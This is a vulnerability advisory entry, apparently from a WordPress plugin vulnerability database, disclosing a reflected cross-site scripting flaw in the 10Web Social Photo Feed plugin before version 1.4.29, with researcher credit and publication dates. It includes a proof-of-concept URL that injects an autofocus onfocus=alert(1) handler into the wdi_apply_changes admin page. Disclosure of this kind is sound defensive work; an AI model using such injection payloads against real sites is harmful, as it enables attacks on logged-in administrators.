WordPress Plugin Vulnerabilities
10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)
Description
The plugin was affected by a reflected Cross-Site Scripting (XSS) vulnerability in the wdi_apply_changes admin page, allowing an attacker to perform such attack against any logged in users
Proof of Concept
https://example.com/wp-admin/admin-ajax.php?action=wdi_apply_changes&page=%22%20id=x%20tabindex=1%20onfocus=alert(1)%20autofocus=#x
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-07 (about 2 years ago)
Added
2021-12-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)